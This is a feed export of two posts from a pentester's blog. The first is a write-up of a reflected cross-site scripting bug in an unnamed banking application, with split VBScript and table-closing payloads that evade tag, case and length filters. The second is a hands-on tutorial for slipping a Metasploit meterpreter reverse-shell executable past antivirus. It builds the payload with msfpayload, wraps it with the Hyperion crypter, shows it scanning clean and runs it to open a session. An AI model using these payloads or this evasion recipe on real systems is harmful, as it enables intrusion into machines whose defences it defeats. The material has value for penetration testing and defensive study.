tag:blogger.com,1999:blog-19765693637026423002024-03-28T00:28:29.119-07:003ncrypt0r's BlogShubham Mittalhttp://www.blogger.com/profile/16532487601818259817noreply@blogger.comBlogger5125tag:blogger.com,1999:blog-1976569363702642300.post-52726390128295311462013-07-31T02:40:00.002-07:002017-03-06T08:39:01.405-08:00Multi-Stage Payload : Cross Site Scripting Encounter<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-size: small;"><span style="font-family: inherit;">Hi All,</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">This blog post is a description of a Cross Site Scripting I found in a Banking Application while testing it. I cannot disclose the name obviously, so you would have to gain trust on me.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">Why I am writing a blog post on , "just a XSS", is because i thought this is a bit different from what all we keep finding.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">There were quite a number of filters and constraints which kept me indulged in it for some time.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><i>Restriction 1:</i> Tags were not allowed. If you put any input so that it completes a tag, session gets closed. Point to be noticed, Open tag was allowed.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><i>Restriction 2: </i>Whatever stuff you inject with great force, application was reflecting it in Upper case, so dude.. No javascript shit.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><i>Restriction 3:</i> Max Length of 35 characters.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">1 Plus Point: Web application was only accessible in IE.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">When i started the test, disliked this fact. But by the end, I loved this one.
I was trying with VBscript payloads. But the issue of tags and length based was worst.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">As there were four input parameters, I thought of breaking my payload into parts and then inject.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFhlGgakULC1gWKK4KsShsiILnrG6ks4MGAcmwt_yeThAPfYyHnBNP3Vma7pSy-YWSO8D6C7vqkIAGV63cqIUSej3ifY6jWP3Al3j-uZtpa3UGPxh-qFKE-PILXlz400prIf96m42dN3Bn/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFhlGgakULC1gWKK4KsShsiILnrG6ks4MGAcmwt_yeThAPfYyHnBNP3Vma7pSy-YWSO8D6C7vqkIAGV63cqIUSej3ifY6jWP3Al3j-uZtpa3UGPxh-qFKE-PILXlz400prIf96m42dN3Bn/s400/1.JPG" width="400" /></a></span></span></div>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"> I tried with opening the img src in one input, and then using a single quote trick, took the alert part to next input. So that my payloads being</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">1st Payload: <b>"><img src='a</b></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;">2nd Payload: <b>' onerror=alert(1) size="</b></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">So that, whatever comes in between 1st payload and second one, it becomes the value of the src attribute. But, it didn't worked. Reason being, there was already a single quote in between the two reflection points which caused the value to be broken in between only.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsnAwiCqJDixPgikSD8enDVSd6hVt7DhZiVskNcmtgV3f8BNkmJmPKX-t37sZMXSCJwpsxphQg-9AmiR_iqhP80A7RLh2YfR7U6iSm9nNZd-5wQFUCOrNpNwX0QslRsOgrAXDcbI-Nqljy/s1600/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsnAwiCqJDixPgikSD8enDVSd6hVt7DhZiVskNcmtgV3f8BNkmJmPKX-t37sZMXSCJwpsxphQg-9AmiR_iqhP80A7RLh2YfR7U6iSm9nNZd-5wQFUCOrNpNwX0QslRsOgrAXDcbI-Nqljy/s400/2.JPG" width="400" /></a></span></span></div>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">In place of single quotes, another idea was a pair of /* and */ . but this didn't worked as well.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">3rd option, CDATA, i.e. a pair of <b id="docs-internal-guid-278da5a8-3396-a648-9201-426b830dce5b" style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><![CDATA[ and </span></b><b id="docs-internal-guid-278da5a8-3396-ef70-288f-2d2456101a7d" style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">]]></span></b><b id="docs-internal-guid-278da5a8-3396-ef70-288f-2d2456101a7d" style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>. </b></span></b><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">But this also didn't worked and I later realised this was a stupid one. How can I give a tag inside a tag. Syntactically wrong. </span></span></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">4th option: To use eval function. so possible payloads: </span></span></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1st payload: <b>"><IMG SRC=JAVASCRIPT:ALERT(</b></span></span></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2nd Payload:<b> ) ONERROR=ALERT(1) SIZE="</b></span></span></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It also didn't worked with an issue. Guess what, javascript is case sensitive.</span></span><b id="docs-internal-guid-278da5a8-3396-ef70-288f-2d2456101a7d" style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></b></span></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixC22o6nJQ0a3wbYKmSZLb-Yj6SmwS7pPYk3BgQutlapr40D3L50OHijlzZ3ZC8wKC9aDlEE9gY2yJagUhIuCqzNh0JSP3k8N7xwHkhOh0FwkA4dKoMX1jZIoYfPDyaHPX9SfUUc_LgVV5/s1600/3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixC22o6nJQ0a3wbYKmSZLb-Yj6SmwS7pPYk3BgQutlapr40D3L50OHijlzZ3ZC8wKC9aDlEE9gY2yJagUhIuCqzNh0JSP3k8N7xwHkhOh0FwkA4dKoMX1jZIoYfPDyaHPX9SfUUc_LgVV5/s400/3.JPG" width="400" /></a></span></span></div>
<span style="font-size: small;"><span style="font-family: inherit;"><b id="docs-internal-guid-278da5a8-3396-ef70-288f-2d2456101a7d" style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></b></span></span>
<br />
<span style="font-size: small;"><span style="font-family: inherit;"><b id="docs-internal-guid-278da5a8-3396-ef70-288f-2d2456101a7d" style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></b></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">But this one popped something cool into my mind. Why not use A href with vbscript, already the application was into IE so all potential victims will be using IE only. </span></span></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">So i crafted the payloads as :</span></span></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1st payload:<b> "><A HREF="VBSCRIPT:MSGBOX(1)"</b></span></span></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2nd Payload: <b>">)AAAAA><A"</b></span></span></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This time the payload got injected, but didnt gave me any hyperlink on the page except a normal text of "AAAAA". I realized, things were going into two tables, so why not close them using two more parameters. We already have four vulnerable parameters.</span></span></span></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfrsouFzI8zDUJDIgk5-VUqLNTxGVqbiVaWyNAd_1ZeEQ1YNXsmg7mmMSpvLBWGRpezWh2PCLD4-K-HKwlpykqONDMX4gygvocUPPyd9RmftPgz0etCIgcFEUX7v5ATJIeBqYVmsR6SRH_/s1600/4.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfrsouFzI8zDUJDIgk5-VUqLNTxGVqbiVaWyNAd_1ZeEQ1YNXsmg7mmMSpvLBWGRpezWh2PCLD4-K-HKwlpykqONDMX4gygvocUPPyd9RmftPgz0etCIgcFEUX7v5ATJIeBqYVmsR6SRH_/s400/4.JPG" width="400" /></a></span></span></div>
<br />
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdlGKyIINmdAglqK8GzriGbZpceJDcWqZyI_FLiJJ85kGUxOJjceaEhm7pfRYmHU6apVGXfytdp61FszlbKA2iH9tGRbiYXwv_c84Oxfbj1OZ6XTHMNbsP57qvBBXjoVzpowerLTPSxIVA/s1600/5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdlGKyIINmdAglqK8GzriGbZpceJDcWqZyI_FLiJJ85kGUxOJjceaEhm7pfRYmHU6apVGXfytdp61FszlbKA2iH9tGRbiYXwv_c84Oxfbj1OZ6XTHMNbsP57qvBBXjoVzpowerLTPSxIVA/s400/5.JPG" width="400" /></a></span></span></div>
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> Next set of payloads I tried. </span></span></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1st Payload: <b>"></TABLE b="</b><br />2nd Payload: <b>"></TABLE b="</b><br />3rd Payload: <b> "><A HREF="VBSCRIPT:MSGBOX(1)"</b><br />4th Payload: <b>">)AAAAA><A"</b></span></span></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">I used the left back values of "value" attribute each time into the tag which I was injecting, i.e. in table of A tag.</span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ_Wrui2KI7q1Jyh7MLa7oU1jQuA2jqafpF91lqMVsTi2nlLJAsQqYsZ7cgLjJ5cqQslZChQjqRrGO3pv12pgLyNsLCsi-qVFOzBfYuQ9rkYizRFUlUiW98cREvFoUa_4Q3LnqVPli0Wn7/s1600/6.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ_Wrui2KI7q1Jyh7MLa7oU1jQuA2jqafpF91lqMVsTi2nlLJAsQqYsZ7cgLjJ5cqQslZChQjqRrGO3pv12pgLyNsLCsi-qVFOzBfYuQ9rkYizRFUlUiW98cREvFoUa_4Q3LnqVPli0Wn7/s400/6.JPG" width="400" /></a></span></span></div>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMej0s5iUB13R-pqOtqwrBMCUGBAvCk0Ap3N8cCqg8zLAtfemuAJZf3XdWcmxM8azTV_BNDyKgPDS5ikDfLPxEK6xMHKWiG0y96KuGc2Ohiw4AbSHMcqWkJsL3O1BPCClUchWE9LQPeacg/s1600/7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMej0s5iUB13R-pqOtqwrBMCUGBAvCk0Ap3N8cCqg8zLAtfemuAJZf3XdWcmxM8azTV_BNDyKgPDS5ikDfLPxEK6xMHKWiG0y96KuGc2Ohiw4AbSHMcqWkJsL3O1BPCClUchWE9LQPeacg/s400/7.JPG" width="400" /></a></span></span></div>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">Result : POP UP. </span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFLvYMjfScFm8i2uhiZ4AzJ8ay2ebU7y9MkCw8INPvacArrcWjwKbyLBANLXKciX-pkq_M1MYi-UqsQZv16yFOsv599pegxw-g9PXgWvdxONgbr7fUNSoPSMPyqcWje3dx4mKqapXH2hqY/s1600/8.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFLvYMjfScFm8i2uhiZ4AzJ8ay2ebU7y9MkCw8INPvacArrcWjwKbyLBANLXKciX-pkq_M1MYi-UqsQZv16yFOsv599pegxw-g9PXgWvdxONgbr7fUNSoPSMPyqcWje3dx4mKqapXH2hqY/s400/8.JPG" width="400" /></a></span></span></div>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span><br />
<div style="text-align: center;">
<span style="font-size: small;"><span style="font-family: inherit;"><span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px;"> </span><span dir="ltr" id=":2w5" style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px;">You can learn Ehtical Hacking from the Infosec Institute, one of the leading institute in the field of Information Security training: <a href="http://www.infosecinstitute.com/courses/ethical_hacking_training.html" needshandler="needsHandler" style="color: #0065cc;">http://www.info<wbr></wbr>secinstitute.co<wbr></wbr>m/courses/ethic<wbr></wbr>al_hacking_trai<wbr></wbr>ning.html</a></span></span></span><br />
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: inherit;">Learn Adobe CQ Pentesting from this resource: </span></span><a href="http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/">http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/</a></div>
<span style="font-size: small;"><span style="font-family: inherit;"><br /></span></span>Shubham Mittalhttp://www.blogger.com/profile/16532487601818259817noreply@blogger.com178tag:blogger.com,1999:blog-1976569363702642300.post-10523520349892003632012-09-07T03:48:00.001-07:002014-02-25T22:40:08.796-08:00Bypassing Antivirus with PE CryptersWell most of the time when we do penetration test, we are facing a super cool AV protection which stops us to execute our lovely EXEs, shellcodes, etc.<br />
<br />
I was looking around the same and from a presentation of Mr. Dave Kennedy at DerbyCon, i got something quite useful. He used some words like "shellcodexec" and "PE crypters". On digging it here and there, i found that shellcodexec is a small utility to inject a Shellcode into any process and thus execute your malicious intentions. This is done with approach that when there is no file at all, what signature will AVs match? However shellcodexec is itself getting caught nowadays and therefore I will not suggest you to go for it.<br />
<br />
On the other hand, PE Crypters (from Nullsecurity team) will encrypt a Binary file with a sexy crypting approach and thus can be used to bypass the AV.The whole project is running under the name of HYPERION project and is a proper working way to mess around with AVs. So lets start.<br />
<br />
Well there has been great stuff for AVs detecting the templates with which we encrypt our EXE and likely the decryption approach of the program to reach the actuall offset, AVs started doing the same with the result of "Detection". In this PE Cryters, payload is not scrambled, instead it is encapsulated. A different key as a cipher is used every time and at the time of execution, Brute Force can be done. So it will take time, huh? Well yeah it will take time if our key is long. We will keep our key short and everything will go fine. This is whot Hyperion Pe Crypters will do; in short. A weak 128 bit AES key is used to encapsulate the packet which is simply brute forced at the time of execution. If you want to give it a hardcore look, check out this research paper (<a href="http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf">http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf</a>)<br />
<br />
Anyways, for super cool guys, this was enough. But as only the Source files are available by now, For those who are new to these things, that can be a little troublesome :P; Well let me give a go through. First of all choose your platform; M preferring Linux all the way but its your system, and your choice too.<br />
<br />
<span style="font-size: large;">Next <a href="http://www.nullsecurity.net/tools/binary/Hyperion-1.0.zip">Download the project</a>;</span><br />
or use: <i>wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip</i><br />
<i><br /></i>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgakWgDHQTS8jqp-UYp-EKnwIqkvgHqm9am4fPkDJ33GaOSx_atq4jstoomzRpHBZzL8sz5rWd70Na3UXub6WSN2L-6clRWpoLCXZflT_cDbKSIiyv3E6ArWgHoyfsf137BW5Q4U5OKPmi3/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgakWgDHQTS8jqp-UYp-EKnwIqkvgHqm9am4fPkDJ33GaOSx_atq4jstoomzRpHBZzL8sz5rWd70Na3UXub6WSN2L-6clRWpoLCXZflT_cDbKSIiyv3E6ArWgHoyfsf137BW5Q4U5OKPmi3/s400/1.PNG" height="165" width="400" /></a>
<br />
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Unzip It. </span><br />
<i>unzip Hyperion-1.0.zip</i><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKG3UqX1uG4l60EBBLgyMI1BTacLaC-WleJvFHceXMdlhqsZnDpQ32h4BBrtRSaPQd6PlqOyuOuIEOX7p-uye1qqjJs5KMJ0k3SZFj-2OtLCjumyZK5PCR4DNo6l4fLfUhOrtlJmQcAEpr/s1600/2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKG3UqX1uG4l60EBBLgyMI1BTacLaC-WleJvFHceXMdlhqsZnDpQ32h4BBrtRSaPQd6PlqOyuOuIEOX7p-uye1qqjJs5KMJ0k3SZFj-2OtLCjumyZK5PCR4DNo6l4fLfUhOrtlJmQcAEpr/s1600/2.PNG" /></a>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: large;">Change the directory, and compile it.</span><br />
<i>cd Hyperion-1.0.zip</i><br />
<i>wine /root/drive_c/MinGW/bin/g++ Src/Crypter/*.cpp -o shubham.exe</i><br />
<i><br /></i>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu9AMMQaaywb8C3obfQmHYaC9Dp-LdY2uYhiXzV1lWw1z_kxXMVhDUXMw3BWIGv3dI3ZA0yDoQ_uRH-IVjFGzOXaL4XyS2WUf-SfAa7OhnkgrzMs_VU5phElOfwEkEJWcdYe77oHxVIiZP/s1600/3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu9AMMQaaywb8C3obfQmHYaC9Dp-LdY2uYhiXzV1lWw1z_kxXMVhDUXMw3BWIGv3dI3ZA0yDoQ_uRH-IVjFGzOXaL4XyS2WUf-SfAa7OhnkgrzMs_VU5phElOfwEkEJWcdYe77oHxVIiZP/s640/3.PNG" height="232" width="640" /></a>
<br />
<br />
Once you have created executable for Crypting, shubham.exe in this case, you can start playing around with EXEs. I am creating a msfpayload for reverse connection and once it is crypted using Hyperion, it must bypass AV along with sending back the reverse connection.<br />
<br />
<span style="font-size: large;">Create the Payload.4</span><br />
<i>msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 X > msf1.exe</i><br />
<i><br /></i>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW1JG9Sbdv0Hxa-TI8UECoNaViCdZE43Ow3XPIgyuNbREUZ7ghHBh8YbXlbI1JZBv65Dbe56lsVUfCon2TmX7YQ_EMMWwB4Z67fp3x6voz1JloreB7cMLQLOZxZ7GRxwaSKfo2471BkqXl/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW1JG9Sbdv0Hxa-TI8UECoNaViCdZE43Ow3XPIgyuNbREUZ7ghHBh8YbXlbI1JZBv65Dbe56lsVUfCon2TmX7YQ_EMMWwB4Z67fp3x6voz1JloreB7cMLQLOZxZ7GRxwaSKfo2471BkqXl/s640/4.PNG" height="240" width="640" /></a>
<br />
<br />
<span style="font-size: large;">Scan it. </span><br />
Once the payload is ready, we will scan it first (without crypting).<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaS_q8tPCbvN3Ayt6jqH383FxD7lfie3l6dencQ2ZF1-PIChC6rVVOpFVyh3m_M8PzfJGGRv1325eN2o_hOp7Aivam3kfg_q8FMvgHDgXzLRgTTYJSutP08xv54kJWxkW6_AzQu20_yQV3/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaS_q8tPCbvN3Ayt6jqH383FxD7lfie3l6dencQ2ZF1-PIChC6rVVOpFVyh3m_M8PzfJGGRv1325eN2o_hOp7Aivam3kfg_q8FMvgHDgXzLRgTTYJSutP08xv54kJWxkW6_AzQu20_yQV3/s640/5.PNG" height="337" width="640" /></a>
<br />
<br />
<span style="font-size: large;">Lets Crypt it with Hyperion.</span><br />
<i>wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe</i><br />
<i>ls -l</i><br />
<i><br /></i>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2sNadM8QWJ1qx8vm6xUPoZg65-clTG4Lx89H4ZrMKR3DGCi2S4AlyEn2gBL2khmFNjKToH0cSpUWbeS4hqbjal7GHQ_QlRshDLFYAZ8D64QTA2IppsbUmP2QhgV-2kthJXtXPz5nAj7bh/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2sNadM8QWJ1qx8vm6xUPoZg65-clTG4Lx89H4ZrMKR3DGCi2S4AlyEn2gBL2khmFNjKToH0cSpUWbeS4hqbjal7GHQ_QlRshDLFYAZ8D64QTA2IppsbUmP2QhgV-2kthJXtXPz5nAj7bh/s640/6.PNG" height="324" width="640" /></a>
<br />
<i><br /></i>
<span style="font-size: large;">Scan it.</span><br />
No Detection<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_GzbWK-HFeYeP57VTGrV-LvTEiJEsE-A0F4TI_T7c2-xW05J11SqavVzPY4CI4WSebB4Z3ZnQXkedp3fDQ_P-pMC-f2bYNpeLEA7sKu3nsGv9pj0AlkIILcSjXTYh75NWaG0vi4YojHDg/s1600/7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_GzbWK-HFeYeP57VTGrV-LvTEiJEsE-A0F4TI_T7c2-xW05J11SqavVzPY4CI4WSebB4Z3ZnQXkedp3fDQ_P-pMC-f2bYNpeLEA7sKu3nsGv9pj0AlkIILcSjXTYh75NWaG0vi4YojHDg/s640/7.PNG" height="286" width="640" /></a>
<br />
<br />
<span style="font-size: large;">Execute it.</span><br />
As soon as you will execute it, it will start brute forcing which will make the CPU Usage 100%.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdHEMsK7BK4DhXRbVn7_R1ieDMFRSza1E7Z_fMFZallLVaPEHW8gvJYW0Z9SBuB7B8ooYTOz-Cbx_9Ry5hJNbfzDUZzEkhQApNz9yqIEilc13g508oSg6BQ1O8aYzn-7LomEC6U7cSCglK/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdHEMsK7BK4DhXRbVn7_R1ieDMFRSza1E7Z_fMFZallLVaPEHW8gvJYW0Z9SBuB7B8ooYTOz-Cbx_9Ry5hJNbfzDUZzEkhQApNz9yqIEilc13g508oSg6BQ1O8aYzn-7LomEC6U7cSCglK/s640/8.png" height="356" width="640" /></a>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-size: large;">Enjoy It.</span><br />
As soon as the brute force will get over, CPU Usage will reduce to normal and a session will get generated.<br />
<br />
